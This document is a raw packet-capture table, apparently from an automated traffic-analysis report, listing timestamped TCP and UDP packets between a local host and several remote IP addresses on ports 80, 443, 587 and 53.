            Jul 26, 2024 11:39:07.685070038 CEST4971480192.168.2.5158.101.44.242
            Jul 26, 2024 11:39:07.690812111 CEST8049714158.101.44.242192.168.2.5
            Jul 26, 2024 11:39:07.690897942 CEST4971480192.168.2.5158.101.44.242
            Jul 26, 2024 11:39:07.690953970 CEST4971480192.168.2.5158.101.44.242
            Jul 26, 2024 11:39:07.697208881 CEST8049714158.101.44.242192.168.2.5
            Jul 26, 2024 11:39:08.324615955 CEST8049714158.101.44.242192.168.2.5
            Jul 26, 2024 11:39:08.326114893 CEST49715443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:08.326148987 CEST44349715188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:08.326350927 CEST49715443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:08.326608896 CEST49715443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:08.326621056 CEST44349715188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:08.376194000 CEST4971480192.168.2.5158.101.44.242
            Jul 26, 2024 11:39:08.811335087 CEST44349715188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:08.812900066 CEST49715443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:08.812941074 CEST44349715188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:08.938364029 CEST44349715188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:08.938572884 CEST44349715188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:08.938725948 CEST49715443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:08.938939095 CEST49715443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:08.941608906 CEST4971480192.168.2.5158.101.44.242
            Jul 26, 2024 11:39:08.942508936 CEST4971680192.168.2.5158.101.44.242
            Jul 26, 2024 11:39:08.947098970 CEST8049714158.101.44.242192.168.2.5
            Jul 26, 2024 11:39:08.947160006 CEST4971480192.168.2.5158.101.44.242
            Jul 26, 2024 11:39:08.947259903 CEST8049716158.101.44.242192.168.2.5
            Jul 26, 2024 11:39:08.947310925 CEST4971680192.168.2.5158.101.44.242
            Jul 26, 2024 11:39:08.947376013 CEST4971680192.168.2.5158.101.44.242
            Jul 26, 2024 11:39:08.952137947 CEST8049716158.101.44.242192.168.2.5
            Jul 26, 2024 11:39:09.533092022 CEST8049716158.101.44.242192.168.2.5
            Jul 26, 2024 11:39:09.534358025 CEST49717443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:09.534389019 CEST44349717188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:09.534473896 CEST49717443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:09.534775019 CEST49717443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:09.534785986 CEST44349717188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:09.579385042 CEST4971680192.168.2.5158.101.44.242
            Jul 26, 2024 11:39:10.039746046 CEST44349717188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:10.042064905 CEST49717443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:10.042098999 CEST44349717188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:10.175286055 CEST44349717188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:10.175393105 CEST44349717188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:10.175445080 CEST49717443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:10.175807953 CEST49717443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:10.178982019 CEST4971680192.168.2.5158.101.44.242
            Jul 26, 2024 11:39:10.180231094 CEST4971880192.168.2.5158.101.44.242
            Jul 26, 2024 11:39:10.185339928 CEST8049716158.101.44.242192.168.2.5
            Jul 26, 2024 11:39:10.185355902 CEST8049718158.101.44.242192.168.2.5
            Jul 26, 2024 11:39:10.185606956 CEST4971680192.168.2.5158.101.44.242
            Jul 26, 2024 11:39:10.185619116 CEST4971880192.168.2.5158.101.44.242
            Jul 26, 2024 11:39:10.185650110 CEST4971880192.168.2.5158.101.44.242
            Jul 26, 2024 11:39:10.190747023 CEST8049718158.101.44.242192.168.2.5
            Jul 26, 2024 11:39:10.778944969 CEST8049718158.101.44.242192.168.2.5
            Jul 26, 2024 11:39:10.780145884 CEST49719443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:10.780237913 CEST44349719188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:10.780325890 CEST49719443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:10.780567884 CEST49719443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:10.780602932 CEST44349719188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:10.829504013 CEST4971880192.168.2.5158.101.44.242
            Jul 26, 2024 11:39:11.317209005 CEST44349719188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:11.319113016 CEST49719443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:11.319188118 CEST44349719188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:11.471843958 CEST44349719188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:11.471946001 CEST44349719188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:11.472151995 CEST49719443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:11.475883007 CEST49719443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:11.479039907 CEST4971880192.168.2.5158.101.44.242
            Jul 26, 2024 11:39:11.480336905 CEST4972080192.168.2.5158.101.44.242
            Jul 26, 2024 11:39:11.484880924 CEST8049718158.101.44.242192.168.2.5
            Jul 26, 2024 11:39:11.484963894 CEST4971880192.168.2.5158.101.44.242
            Jul 26, 2024 11:39:11.485174894 CEST8049720158.101.44.242192.168.2.5
            Jul 26, 2024 11:39:11.485250950 CEST4972080192.168.2.5158.101.44.242
            Jul 26, 2024 11:39:11.485342979 CEST4972080192.168.2.5158.101.44.242
            Jul 26, 2024 11:39:11.490305901 CEST8049720158.101.44.242192.168.2.5
            Jul 26, 2024 11:39:12.280565977 CEST8049720158.101.44.242192.168.2.5
            Jul 26, 2024 11:39:12.281582117 CEST49721443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:12.281668901 CEST44349721188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:12.281888008 CEST49721443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:12.282013893 CEST49721443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:12.282036066 CEST44349721188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:12.301397085 CEST8049720158.101.44.242192.168.2.5
            Jul 26, 2024 11:39:12.301562071 CEST4972080192.168.2.5158.101.44.242
            Jul 26, 2024 11:39:12.763369083 CEST44349721188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:12.765331030 CEST49721443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:12.765381098 CEST44349721188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:12.906917095 CEST44349721188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:12.907145977 CEST44349721188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:12.907311916 CEST49721443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:12.907661915 CEST49721443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:12.910885096 CEST4972080192.168.2.5158.101.44.242
            Jul 26, 2024 11:39:12.911915064 CEST4972280192.168.2.5158.101.44.242
            Jul 26, 2024 11:39:12.917046070 CEST8049720158.101.44.242192.168.2.5
            Jul 26, 2024 11:39:12.917120934 CEST4972080192.168.2.5158.101.44.242
            Jul 26, 2024 11:39:12.917367935 CEST8049722158.101.44.242192.168.2.5
            Jul 26, 2024 11:39:12.917574883 CEST4972280192.168.2.5158.101.44.242
            Jul 26, 2024 11:39:12.917669058 CEST4972280192.168.2.5158.101.44.242
            Jul 26, 2024 11:39:12.922492981 CEST8049722158.101.44.242192.168.2.5
            Jul 26, 2024 11:39:13.480638027 CEST8049722158.101.44.242192.168.2.5
            Jul 26, 2024 11:39:13.482032061 CEST49723443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:13.482125044 CEST44349723188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:13.482284069 CEST49723443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:13.482513905 CEST49723443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:13.482549906 CEST44349723188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:13.532541037 CEST4972280192.168.2.5158.101.44.242
            Jul 26, 2024 11:39:13.984962940 CEST44349723188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:13.987092972 CEST49723443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:13.987174988 CEST44349723188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:14.121973038 CEST44349723188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:14.122095108 CEST44349723188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:14.122273922 CEST49723443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:14.122596025 CEST49723443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:20.245672941 CEST4972280192.168.2.5158.101.44.242
            Jul 26, 2024 11:39:20.397511005 CEST8049722158.101.44.242192.168.2.5
            Jul 26, 2024 11:39:20.397598982 CEST4972280192.168.2.5158.101.44.242
            Jul 26, 2024 11:39:20.590868950 CEST49730587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:20.604700089 CEST5874973077.245.159.7192.168.2.5
            Jul 26, 2024 11:39:20.604785919 CEST49730587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:21.493563890 CEST5874973077.245.159.7192.168.2.5
            Jul 26, 2024 11:39:21.493731976 CEST49730587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:21.498662949 CEST5874973077.245.159.7192.168.2.5
            Jul 26, 2024 11:39:21.728148937 CEST5874973077.245.159.7192.168.2.5
            Jul 26, 2024 11:39:21.730078936 CEST49730587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:21.735225916 CEST5874973077.245.159.7192.168.2.5
            Jul 26, 2024 11:39:21.964288950 CEST5874973077.245.159.7192.168.2.5
            Jul 26, 2024 11:39:21.964698076 CEST49730587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:21.970098019 CEST5874973077.245.159.7192.168.2.5
            Jul 26, 2024 11:39:22.267419100 CEST5874973077.245.159.7192.168.2.5
            Jul 26, 2024 11:39:22.267713070 CEST49730587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:22.272617102 CEST5874973077.245.159.7192.168.2.5
            Jul 26, 2024 11:39:22.501398087 CEST5874973077.245.159.7192.168.2.5
            Jul 26, 2024 11:39:22.502785921 CEST49730587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:22.507781029 CEST5874973077.245.159.7192.168.2.5
            Jul 26, 2024 11:39:22.739942074 CEST5874973077.245.159.7192.168.2.5
            Jul 26, 2024 11:39:22.740250111 CEST49730587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:22.745528936 CEST5874973077.245.159.7192.168.2.5
            Jul 26, 2024 11:39:22.974374056 CEST5874973077.245.159.7192.168.2.5
            Jul 26, 2024 11:39:22.975143909 CEST49730587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:22.975239038 CEST49730587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:22.975271940 CEST49730587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:22.975301981 CEST49730587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:22.980184078 CEST5874973077.245.159.7192.168.2.5
            Jul 26, 2024 11:39:22.980226040 CEST5874973077.245.159.7192.168.2.5
            Jul 26, 2024 11:39:22.980535984 CEST5874973077.245.159.7192.168.2.5
            Jul 26, 2024 11:39:22.980668068 CEST5874973077.245.159.7192.168.2.5
            Jul 26, 2024 11:39:23.389702082 CEST5874973077.245.159.7192.168.2.5
            Jul 26, 2024 11:39:23.438796997 CEST49730587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:32.611268044 CEST49730587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:32.616379976 CEST5874973077.245.159.7192.168.2.5
            Jul 26, 2024 11:39:33.046582937 CEST5874973077.245.159.7192.168.2.5
            Jul 26, 2024 11:39:33.046659946 CEST5874973077.245.159.7192.168.2.5
            Jul 26, 2024 11:39:33.046875954 CEST49730587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:33.047022104 CEST49730587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:33.048312902 CEST49731587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:33.051847935 CEST5874973077.245.159.7192.168.2.5
            Jul 26, 2024 11:39:33.053273916 CEST5874973177.245.159.7192.168.2.5
            Jul 26, 2024 11:39:33.053354025 CEST49731587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:33.713608980 CEST5874973177.245.159.7192.168.2.5
            Jul 26, 2024 11:39:33.713798046 CEST49731587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:33.718795061 CEST5874973177.245.159.7192.168.2.5
            Jul 26, 2024 11:39:33.950326920 CEST5874973177.245.159.7192.168.2.5
            Jul 26, 2024 11:39:33.950932980 CEST49731587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:33.956379890 CEST5874973177.245.159.7192.168.2.5
            Jul 26, 2024 11:39:34.187680006 CEST5874973177.245.159.7192.168.2.5
            Jul 26, 2024 11:39:34.187983036 CEST49731587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:34.193229914 CEST5874973177.245.159.7192.168.2.5
            Jul 26, 2024 11:39:34.439315081 CEST5874973177.245.159.7192.168.2.5
            Jul 26, 2024 11:39:34.439483881 CEST49731587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:34.444466114 CEST5874973177.245.159.7192.168.2.5
            Jul 26, 2024 11:39:34.675419092 CEST5874973177.245.159.7192.168.2.5
            Jul 26, 2024 11:39:34.675558090 CEST49731587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:34.680655003 CEST5874973177.245.159.7192.168.2.5
            Jul 26, 2024 11:39:34.915971994 CEST5874973177.245.159.7192.168.2.5
            Jul 26, 2024 11:39:34.916703939 CEST49731587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:34.922061920 CEST5874973177.245.159.7192.168.2.5
            Jul 26, 2024 11:39:35.154544115 CEST5874973177.245.159.7192.168.2.5
            Jul 26, 2024 11:39:35.154782057 CEST49731587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:35.154834032 CEST49731587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:35.154834032 CEST49731587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:35.154834032 CEST49731587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:35.159977913 CEST5874973177.245.159.7192.168.2.5
            Jul 26, 2024 11:39:35.160021067 CEST5874973177.245.159.7192.168.2.5
            Jul 26, 2024 11:39:35.160063028 CEST5874973177.245.159.7192.168.2.5
            Jul 26, 2024 11:39:35.160561085 CEST5874973177.245.159.7192.168.2.5
            Jul 26, 2024 11:39:35.394805908 CEST5874973177.245.159.7192.168.2.5
            Jul 26, 2024 11:39:35.395258904 CEST49731587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:35.400239944 CEST5874973177.245.159.7192.168.2.5
            Jul 26, 2024 11:39:35.846493006 CEST5874973177.245.159.7192.168.2.5
            Jul 26, 2024 11:39:35.846617937 CEST49731587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:35.847031116 CEST5874973177.245.159.7192.168.2.5
            Jul 26, 2024 11:39:35.847090006 CEST49731587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:35.847687960 CEST49732587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:35.851511002 CEST5874973177.245.159.7192.168.2.5
            Jul 26, 2024 11:39:35.852689028 CEST5874973277.245.159.7192.168.2.5
            Jul 26, 2024 11:39:35.852760077 CEST49732587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:36.504353046 CEST5874973277.245.159.7192.168.2.5
            Jul 26, 2024 11:39:36.504496098 CEST49732587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:36.509747982 CEST5874973277.245.159.7192.168.2.5
            Jul 26, 2024 11:39:36.739263058 CEST5874973277.245.159.7192.168.2.5
            Jul 26, 2024 11:39:36.739579916 CEST49732587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:36.744854927 CEST5874973277.245.159.7192.168.2.5
            Jul 26, 2024 11:39:36.975043058 CEST5874973277.245.159.7192.168.2.5
            Jul 26, 2024 11:39:36.975502014 CEST49732587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:36.980488062 CEST5874973277.245.159.7192.168.2.5
            Jul 26, 2024 11:39:37.237426043 CEST5874973277.245.159.7192.168.2.5
            Jul 26, 2024 11:39:37.237565041 CEST49732587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:37.242520094 CEST5874973277.245.159.7192.168.2.5
            Jul 26, 2024 11:39:37.474749088 CEST5874973277.245.159.7192.168.2.5
            Jul 26, 2024 11:39:37.474888086 CEST49732587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:37.479747057 CEST5874973277.245.159.7192.168.2.5
            Jul 26, 2024 11:39:37.713821888 CEST5874973277.245.159.7192.168.2.5
            Jul 26, 2024 11:39:37.713948965 CEST49732587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:37.718868971 CEST5874973277.245.159.7192.168.2.5
            Jul 26, 2024 11:39:37.950402021 CEST5874973277.245.159.7192.168.2.5
            Jul 26, 2024 11:39:37.950634956 CEST49732587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:37.950670958 CEST49732587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:37.950697899 CEST49732587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:37.950714111 CEST49732587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:37.955630064 CEST5874973277.245.159.7192.168.2.5
            Jul 26, 2024 11:39:37.955805063 CEST5874973277.245.159.7192.168.2.5
            Jul 26, 2024 11:39:37.955862045 CEST5874973277.245.159.7192.168.2.5
            Jul 26, 2024 11:39:37.955889940 CEST5874973277.245.159.7192.168.2.5
            Jul 26, 2024 11:39:38.367907047 CEST5874973277.245.159.7192.168.2.5
            Jul 26, 2024 11:39:38.368346930 CEST49732587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:38.373298883 CEST5874973277.245.159.7192.168.2.5
            Jul 26, 2024 11:39:38.805028915 CEST5874973277.245.159.7192.168.2.5
            Jul 26, 2024 11:39:38.805310965 CEST49732587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:38.805748940 CEST5874973277.245.159.7192.168.2.5
            Jul 26, 2024 11:39:38.805818081 CEST49732587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:38.806474924 CEST49733587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:38.810945988 CEST5874973277.245.159.7192.168.2.5
            Jul 26, 2024 11:39:38.811448097 CEST5874973377.245.159.7192.168.2.5
            Jul 26, 2024 11:39:38.811518908 CEST49733587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:39.490287066 CEST5874973377.245.159.7192.168.2.5
            Jul 26, 2024 11:39:39.490523100 CEST49733587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:39.495441914 CEST5874973377.245.159.7192.168.2.5
            Jul 26, 2024 11:39:39.732033014 CEST5874973377.245.159.7192.168.2.5
            Jul 26, 2024 11:39:39.732247114 CEST49733587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:39.737231970 CEST5874973377.245.159.7192.168.2.5
            Jul 26, 2024 11:39:39.974550009 CEST5874973377.245.159.7192.168.2.5
            Jul 26, 2024 11:39:39.974811077 CEST49733587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:39.979929924 CEST5874973377.245.159.7192.168.2.5
            Jul 26, 2024 11:39:40.234587908 CEST5874973377.245.159.7192.168.2.5
            Jul 26, 2024 11:39:40.234877110 CEST49733587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:40.239918947 CEST5874973377.245.159.7192.168.2.5
            Jul 26, 2024 11:39:40.485876083 CEST5874973377.245.159.7192.168.2.5
            Jul 26, 2024 11:39:40.492093086 CEST49733587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:40.497246981 CEST5874973377.245.159.7192.168.2.5
            Jul 26, 2024 11:39:40.738343000 CEST5874973377.245.159.7192.168.2.5
            Jul 26, 2024 11:39:40.738498926 CEST49733587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:40.743521929 CEST5874973377.245.159.7192.168.2.5
            Jul 26, 2024 11:39:40.981273890 CEST5874973377.245.159.7192.168.2.5
            Jul 26, 2024 11:39:40.982223034 CEST49733587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:40.982223988 CEST49733587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:40.982223988 CEST49733587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:40.982223988 CEST49733587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:40.987675905 CEST5874973377.245.159.7192.168.2.5
            Jul 26, 2024 11:39:40.987710953 CEST5874973377.245.159.7192.168.2.5
            Jul 26, 2024 11:39:40.987723112 CEST5874973377.245.159.7192.168.2.5
            Jul 26, 2024 11:39:40.987734079 CEST5874973377.245.159.7192.168.2.5
            Jul 26, 2024 11:39:41.426445961 CEST5874973377.245.159.7192.168.2.5
            Jul 26, 2024 11:39:41.427006006 CEST49733587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:41.432324886 CEST5874973377.245.159.7192.168.2.5
            Jul 26, 2024 11:39:41.870563030 CEST5874973377.245.159.7192.168.2.5
            Jul 26, 2024 11:39:41.870790005 CEST5874973377.245.159.7192.168.2.5
            Jul 26, 2024 11:39:41.871001005 CEST49733587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:41.871001005 CEST49733587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:41.872440100 CEST49734587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:41.876044035 CEST5874973377.245.159.7192.168.2.5
            Jul 26, 2024 11:39:41.877397060 CEST5874973477.245.159.7192.168.2.5
            Jul 26, 2024 11:39:41.877465963 CEST49734587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:43.123014927 CEST5874973477.245.159.7192.168.2.5
            Jul 26, 2024 11:39:43.123116970 CEST5874973477.245.159.7192.168.2.5
            Jul 26, 2024 11:39:43.123375893 CEST49734587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:43.123375893 CEST49734587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:43.123497009 CEST5874973477.245.159.7192.168.2.5
            Jul 26, 2024 11:39:43.123567104 CEST49734587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:43.128458023 CEST5874973477.245.159.7192.168.2.5
            Jul 26, 2024 11:39:43.359286070 CEST5874973477.245.159.7192.168.2.5
            Jul 26, 2024 11:39:43.359458923 CEST49734587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:43.364566088 CEST5874973477.245.159.7192.168.2.5
            Jul 26, 2024 11:39:43.600292921 CEST5874973477.245.159.7192.168.2.5
            Jul 26, 2024 11:39:43.600500107 CEST49734587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:43.606754065 CEST5874973477.245.159.7192.168.2.5
            Jul 26, 2024 11:39:43.843796968 CEST5874973477.245.159.7192.168.2.5
            Jul 26, 2024 11:39:43.844057083 CEST49734587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:43.848980904 CEST5874973477.245.159.7192.168.2.5
            Jul 26, 2024 11:39:44.072933912 CEST5874973477.245.159.7192.168.2.5
            Jul 26, 2024 11:39:44.073223114 CEST49734587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:44.078090906 CEST5874973477.245.159.7192.168.2.5
            Jul 26, 2024 11:39:44.309470892 CEST5874973477.245.159.7192.168.2.5
            Jul 26, 2024 11:39:44.309607029 CEST49734587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:44.316983938 CEST5874973477.245.159.7192.168.2.5
            Jul 26, 2024 11:39:44.540345907 CEST5874973477.245.159.7192.168.2.5
            Jul 26, 2024 11:39:44.540656090 CEST49734587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:44.540700912 CEST49734587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:44.540710926 CEST49734587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:44.540724993 CEST49734587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:44.545902967 CEST5874973477.245.159.7192.168.2.5
            Jul 26, 2024 11:39:44.545917034 CEST5874973477.245.159.7192.168.2.5
            Jul 26, 2024 11:39:44.545927048 CEST5874973477.245.159.7192.168.2.5
            Jul 26, 2024 11:39:44.545941114 CEST5874973477.245.159.7192.168.2.5
            Jul 26, 2024 11:39:44.775960922 CEST5874973477.245.159.7192.168.2.5
            Jul 26, 2024 11:39:44.776501894 CEST49734587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:44.781814098 CEST5874973477.245.159.7192.168.2.5
            Jul 26, 2024 11:39:45.208156109 CEST5874973477.245.159.7192.168.2.5
            Jul 26, 2024 11:39:45.208288908 CEST49734587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:45.208425045 CEST5874973477.245.159.7192.168.2.5
            Jul 26, 2024 11:39:45.208477974 CEST49734587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:45.209284067 CEST49735587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:45.213504076 CEST5874973477.245.159.7192.168.2.5
            Jul 26, 2024 11:39:45.214268923 CEST5874973577.245.159.7192.168.2.5
            Jul 26, 2024 11:39:45.214328051 CEST49735587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:45.907793999 CEST5874973577.245.159.7192.168.2.5
            Jul 26, 2024 11:39:45.907948971 CEST49735587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:45.923566103 CEST5874973577.245.159.7192.168.2.5
            Jul 26, 2024 11:39:46.171327114 CEST5874973577.245.159.7192.168.2.5
            Jul 26, 2024 11:39:46.171766996 CEST49735587192.168.2.577.245.159.7
            Jul 26, 2024 11:39:46.178133011 CEST5874973577.245.159.7192.168.2.5
            Jul 26, 2024 11:40:11.460212946 CEST5874973577.245.159.7192.168.2.5
            Jul 26, 2024 11:40:11.460269928 CEST49735587192.168.2.577.245.159.7
            Jul 26, 2024 11:40:11.506748915 CEST49735587192.168.2.577.245.159.7
            Jul 26, 2024 11:40:11.511634111 CEST5874973577.245.159.7192.168.2.5
            Jul 26, 2024 11:40:11.520276070 CEST49737587192.168.2.577.245.159.7
            Jul 26, 2024 11:40:11.525382996 CEST5874973777.245.159.7192.168.2.5
            Jul 26, 2024 11:40:11.525471926 CEST49737587192.168.2.577.245.159.7
            Jul 26, 2024 11:40:11.988769054 CEST8049712158.101.44.242192.168.2.5
            Jul 26, 2024 11:40:11.988862038 CEST4971280192.168.2.5158.101.44.242
            Jul 26, 2024 11:40:29.985862970 CEST49737587192.168.2.577.245.159.7
            Jul 26, 2024 11:40:29.990236998 CEST49738587192.168.2.577.245.159.7
            Jul 26, 2024 11:40:29.991661072 CEST5874973777.245.159.7192.168.2.5
            Jul 26, 2024 11:40:29.991744995 CEST49737587192.168.2.577.245.159.7
            Jul 26, 2024 11:40:29.995954037 CEST5874973877.245.159.7192.168.2.5
            Jul 26, 2024 11:40:29.996067047 CEST49738587192.168.2.577.245.159.7
            Jul 26, 2024 11:40:34.126383066 CEST49738587192.168.2.577.245.159.7
            Jul 26, 2024 11:40:34.128953934 CEST49739587192.168.2.577.245.159.7
            Jul 26, 2024 11:40:34.134548903 CEST5874973877.245.159.7192.168.2.5
            Jul 26, 2024 11:40:34.134607077 CEST49738587192.168.2.577.245.159.7
            Jul 26, 2024 11:40:34.134808064 CEST5874973977.245.159.7192.168.2.5
            Jul 26, 2024 11:40:34.134856939 CEST49739587192.168.2.577.245.159.7
            Jul 26, 2024 11:40:38.956198931 CEST49739587192.168.2.577.245.159.7
            Jul 26, 2024 11:40:38.958627939 CEST49740587192.168.2.577.245.159.7
            Jul 26, 2024 11:40:38.963924885 CEST5874974077.245.159.7192.168.2.5
            Jul 26, 2024 11:40:38.965920925 CEST5874973977.245.159.7192.168.2.5
            Jul 26, 2024 11:40:38.966305017 CEST49739587192.168.2.577.245.159.7
            Jul 26, 2024 11:40:38.966305017 CEST49740587192.168.2.577.245.159.7
            Jul 26, 2024 11:40:56.876351118 CEST49740587192.168.2.577.245.159.7
            Jul 26, 2024 11:40:56.880525112 CEST49741587192.168.2.577.245.159.7
            Jul 26, 2024 11:40:56.882280111 CEST5874974077.245.159.7192.168.2.5
            Jul 26, 2024 11:40:56.884525061 CEST49740587192.168.2.577.245.159.7
            Jul 26, 2024 11:40:56.886943102 CEST5874974177.245.159.7192.168.2.5
            Jul 26, 2024 11:40:56.892502069 CEST49741587192.168.2.577.245.159.7
            Jul 26, 2024 11:41:05.752412081 CEST49741587192.168.2.577.245.159.7
            Jul 26, 2024 11:41:05.753051996 CEST49742587192.168.2.577.245.159.7
            Jul 26, 2024 11:41:05.758203983 CEST5874974177.245.159.7192.168.2.5
            Jul 26, 2024 11:41:05.758327007 CEST49741587192.168.2.577.245.159.7
            Jul 26, 2024 11:41:05.758790016 CEST5874974277.245.159.7192.168.2.5
            Jul 26, 2024 11:41:05.760504007 CEST49742587192.168.2.577.245.159.7

            UDP Packets

            TimestampSource PortDest PortSource IPDest IP
            Jul 26, 2024 11:38:59.371063948 CEST5478153192.168.2.51.1.1.1
            Jul 26, 2024 11:38:59.445704937 CEST53547811.1.1.1192.168.2.5
            Jul 26, 2024 11:39:04.877788067 CEST5836053192.168.2.51.1.1.1
            Jul 26, 2024 11:39:04.886856079 CEST53583601.1.1.1192.168.2.5
            Jul 26, 2024 11:39:20.246893883 CEST5262453192.168.2.51.1.1.1
